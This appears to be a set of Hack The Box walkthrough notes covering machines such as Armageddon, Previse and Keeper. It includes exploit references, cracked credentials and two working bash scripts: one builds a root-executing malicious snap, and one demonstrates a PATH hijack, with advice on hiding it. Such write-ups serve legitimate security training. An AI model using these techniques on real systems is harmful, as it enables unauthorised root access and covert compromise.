Initial ⇒ Register & Enumeration
Privesc ⇒ /opt/mattermost ⇒ config.json ⇒ mySQL creds ⇒ (MySql-CLI) ⇒ root
Nmap gives 22,80,8065
80 : support ticket system is running ⇒ we can create and track the status of a ticket
8065 : Mattermost running ⇒ we can register (with email confirmation) & login
Create a ticket on the port:80 website using a fake email , track the status of the ticket using the same fake email , on the port:8065 website register the same fake email , the confirmation mail goes directly into the ticket status , click on the confirming link and then we log back in to the mattermost website
Inside it we are able to find SSH creds for user maildeliver
Inside the shell , the /opt directory contains a config.json file which leaks mysql creds. Using those creds and doing some mysql enum with the CLI , we are able to find the hash for the root user.
Ophiuchi
Scriptkiddie
Armageddon
Initial ⇒ Open-source exploit (Drupal 7 v7.56)
Privesc level 1 ⇒ Database creds in /var/www/html/sites/default/setting.php
Privesc level 2 ⇒ Binary exploit snap install * , Crafting malicious snap package
Recon & Enum
port scan
directory scan
website

there is a login page running on it , after enumerating in burp I found that the website is php based and using drupal for authentication
http://10.10.10.233/CHANELOG.TXT
I found the exact version number of drupal
shell as apache
searchsploit
There are lots of exploits listed, but this one matches our needs: right version number, unauthenticated, non-Metasploit, public exploit on GitHub:
CVE-2018-7600
This gives us a shell as apache and provides a link "http://10.10.10.233/shell.php" with parameter "c" through which we can execute commands. Let's get a reverse shell first; double-encode the payload when injecting it. NOTE: the shell we get is /sbin/nologin (non-interactive command execution only), so there are lots of things we cannot do, such as cd, bash, python, nc, wget, etc., and some other things give Permission Denied.
privesc apache => brucetherealadmin
We can't do much here. To escalate privileges I need some kind of credentials, because most commands don't work and I can't even transfer scripts like linpeas to the victim. After some googling I learned where Drupal stores its database credentials: "/sites/default/settings.php".
We got the database (drupal) credentials: "drupaluser" & "CQHEy@9M*m23gBVj". Before running mysql commands, remember we don't have a pty, so the SQL query has to be passed to the client and executed in one go; otherwise the terminal hangs.
We got the hash for user "brucetherealadmin"; save it to a file, identify the hash type (Drupal 7 hashes start with "$S$", hashcat mode 7900), then crack it.
I tried switching user but it didn't work, so I tried SSH and got a shell as brucetherealadmin.
privesc brucetherealadmin => root
sudo -l
Found a binary that I can run as root:
I immediately went to GTFOBins and found this:
It says this binary can't do anything on its own; basically it's a package manager that installs packages just like apt, but we can create a malicious package and then install it through the sudo rule.
creating malicious package
First I just tried to read root.txt: create the package on the attacker machine, transfer it to the victim, and then use snap to install it.
We got root.txt, but not a shell.
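Added example, not the author's package: how the malicious snap is assembled. The package name "evilsnap", the hook body and the output paths are my own choices. What the technique relies on is real snapd behaviour: meta/hooks/install inside the snap is executed as root during installation, and --dangerous --devmode is what lets an unsigned local snap install through the box's "(root) /usr/bin/snap install *" sudo rule (a "*" rule lets us pass those flags).

```bash
#!/usr/bin/env bash
# Added example (not the original author's package): build a malicious snap whose
# install hook runs as root.  The name "evilsnap", the hook body and the paths are
# my own choices; the sudo rule "(root) /usr/bin/snap install *" comes from the box.
set -eu

# Create the snap directory tree: meta/snap.yaml describes the package, and
# meta/hooks/install is executed by snapd (as root) when the snap is installed.
make_snap_tree() {
  local dir="$1" payload="$2"
  mkdir -p "$dir/meta/hooks"
  cat >"$dir/meta/snap.yaml" <<EOF
name: evilsnap
version: '0.1'
summary: Empty snap carrying an install hook
description: The install hook runs as root during 'snap install'
architectures:
- amd64
confinement: devmode
grade: devel
EOF
  printf '#!/bin/sh\n%s\n' "$payload" >"$dir/meta/hooks/install"
  chmod 0755 "$dir/meta/hooks/install"
}

# Pack the tree into a .snap, which is just a squashfs image.
# Needs squashfs-tools (mksquashfs) on the attacker machine.
pack_snap() {
  local dir="$1" out="$2"
  mksquashfs "$dir" "$out" -noappend -comp xz -all-root >/dev/null
}

# Returns 0 if the tree has the two files snapd needs, the hook is executable and
# confinement is devmode (so --devmode is the right flag at install time).
check_snap_tree() {
  local dir="$1"
  [ -f "$dir/meta/snap.yaml" ] && [ -x "$dir/meta/hooks/install" ] \
    && grep -q '^confinement: devmode' "$dir/meta/snap.yaml"
}

# Hook used first on the box: copy root.txt somewhere readable.
# Swap in e.g. "chmod u+s /bin/bash" to get a root shell instead of a file.
PAYLOAD='cp /root/root.txt /tmp/root.txt; chmod 644 /tmp/root.txt'

if [ "${1:-}" = "build" ]; then
  make_snap_tree ./evilsnap "$PAYLOAD"
  check_snap_tree ./evilsnap
  pack_snap ./evilsnap ./evilsnap.snap
  echo "transfer evilsnap.snap to the target, then run:"
  echo "  sudo /usr/bin/snap install --dangerous --devmode ./evilsnap.snap"
fi
```

Run it as "./build.sh build" on the attacker machine, copy evilsnap.snap to the victim, and run the printed sudo command there. The hook runs as root either way, so the difference between "read root.txt" and "get a root shell" is only what the payload line does.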
Knife
Initial ⇒ Recon , Open-exploit
Privesc ⇒ sudo -l , binary abuse :- /usr/bin/knife
Recon & Enum
port scan
directory scan
website
Nothing interesting here, just a static page, although the intercepted response headers show the PHP version.
shell as james
We can search for an exploit for this PHP version; after searching I found this exploit:
privesc james -> root
After searching on GTFOBins I found this:
and I got a shell as root.
Pit
Seal
Previse
Initial ⇒ EAR (Execution After Redirect) , Command Injection
Privesc level 1 ⇒ MySQL creds in /var/www/something/config.php
Privesc level 2 ⇒ sudo -l , PATH hijack in a shell script run with sudo
Recon & Enum
port scan
directory scan
Nothing new found; whatever is discoverable here is already reachable from the web page.
website
http://10.10.11.104 -> redirects -> http://10.10.11.104/login.php
Entering the IP "10.10.11.104" redirects me to "10.10.11.104/login.php", so there is a login page. The site is vulnerable to EAR (Execution After Redirect): the protected pages send the redirect but still render their content, so by intercepting the response in Burp we can see and use them without logging in.
http://10.10.11.104/logs.php
There is functionality to download logs with a specified delimiter: comma, space or tab.
shell as www-data
I captured the request in Burp and tried command injection in the delimiter parameter; it worked. Then I injected the reverse shell and got the callback on my listener.
privesc www-data => m4lwhere => root
www-data -> m4lwhere
On http://10.10.11.104/accounts.php there is functionality to download the site backup file; I downloaded it and after unzipping got a bunch of files, including the config with the MySQL creds.
Let's connect to MySQL; there I got the hash for user "m4lwhere".
After cracking it I got the password ilovecody112235!; su / ssh ... and got a shell as m4lwhere.
m4lwhere -> root
I did sudo -l and found a script I can run as root.
The problem is not in the script's logic: it calls the "gzip" binary without an absolute path while running as root, so I can prepend a directory I control to PATH, create a fake binary named gzip there with my reverse shell in it, and then run the script. gzip resolves to my file and I get the callback on my nc listener.
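Added example, not from the original notes: the PATH hijack reproduced offline. The backup script below is a constructed stand-in for the sudo-able script on the box (the notes do not record its path); the only thing that matters is that it calls gzip without an absolute path. Here everything runs as the current user; on the box the identical invocation under sudo runs the fake gzip as root.

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up: reproduce the gzip PATH hijack
# offline.  The backup script below is a CONSTRUCTED stand-in for the sudo-able
# script on the box (the notes do not record its path); it matters only that it
# calls "gzip" without an absolute path, so whichever gzip is first in PATH runs.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed stand-in for the root-owned backup script: note the bare "gzip".
write_backup_script() {
  cat >"$WORK/access_backup.sh" <<EOF
#!/bin/sh
gzip -c /etc/hostname > "$WORK/hostname.gz"
EOF
  chmod 0755 "$WORK/access_backup.sh"
}

# Drop a fake "gzip" into a directory we control.  It records the uid it ran as
# and exits; on the box this is where the reverse shell goes.  On a real target
# you would usually exec the real gzip afterwards so the script still appears to
# succeed and nothing looks broken to whoever reads the backups.
plant_fake_gzip() {
  marker=$1
  mkdir -p "$WORK/bin"
  cat >"$WORK/bin/gzip" <<EOF
#!/bin/sh
echo "hijacked, running as uid \$(id -u)" >"$marker"
EOF
  chmod 0755 "$WORK/bin/gzip"
}

# Run the script with our directory first in PATH, exactly as you would before
# "sudo /path/to/script" on the box.  Prints "hijacked" if the fake gzip ran,
# "not hijacked" otherwise.
hijack_result() {
  marker="$WORK/ran"
  rm -f "$marker"
  write_backup_script
  plant_fake_gzip "$marker"
  PATH="$WORK/bin:$PATH" "$WORK/access_backup.sh"
  if [ -f "$marker" ]; then echo hijacked; else echo "not hijacked"; fi
}

echo "PATH hijack demo: $(hijack_result)"
```

The caveat worth checking before trying this on another box: it only works when sudo passes your PATH through to the command. If sudoers sets secure_path, sudo replaces PATH with that fixed value and your directory is never searched, no matter what you export beforehand.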
privesc www-data => root
linpeas.sh
linpeas found that the machine is vulnerable to CVE-2021-4034 (pkexec, "PwnKit"), so I googled it.
Run this and get a shell as root: https://github.com/berdav/CVE-2021-4034
Forge
Initial ⇒ SSRF (http://) chained with another SSRF (ftp://) , Recon
Privesc ⇒ Recon in /opt , breaking a script , PDB (Python debugger)
Nmap gives 21 : filtered & 22,80 : open; subdomain enumeration gives admin.forge.htb
On the website forge.htb we can upload a file from the machine as well as from a URL, and visiting admin.forge.htb says only localhost is allowed.
Checking admin.forge.htb through upload-from-URL succeeds: vulnerable to SSRF. Check the URL:
http://admin.forge.htb via the http://forge.htb SSRF fails ⇒ try with mixed upper/lower case:
AdMin.ForGe.hTb (case injection: the host filter compares case-sensitively, while hostnames are not case-sensitive)
After visiting the link, the website gives another obfuscated link which does not work in the browser.
Direct visit fails ⇒ try with curl, or with curl + base64 encode.
This reveals some good information:
Crafting final payload
SSH shell as user "user". For privesc I ran sudo -l, which gives /opt/remote-manage.py. This script:
has a password,
offers some options we can run (1, 2, 3, 4),
starts on a random port when executed,
and if the input is anything other than the given numbers, it drops into PDB automatically.
To deal with it we need another session and have to connect to that same port.
Finally enter any random input; the script breaks on the other end and gives a PDB prompt, where we can insert a reverse shell.
Horizontal
Shibboleth
Writer
Pandora
Meta
Paper
Keeper
Initial ⇒ Default creds || Privesc ⇒ KeePass (CVE-2023-32784) | PuTTY key ⇒ OpenSSH convert
On the website, Request Tracker (RT) by Best Practical is running with a login form. Default creds give access; inside, under the user directory, I was able to find the password for user Lisa.
After SSH, inside the home directory I was able to find file.zip, which on extraction gives a KeePass memory dump & a .kdbx file. For recovering the master password I used the https://github.com/vdohney/keepass-password-dumper exploit, then opened file.kdbx with that master key using kpcli. The above part was done with dotnet version 7.0.
Enumeration of the database gives a PuTTY key for user root; convert the PuTTY key to OpenSSH format and get the shell as root.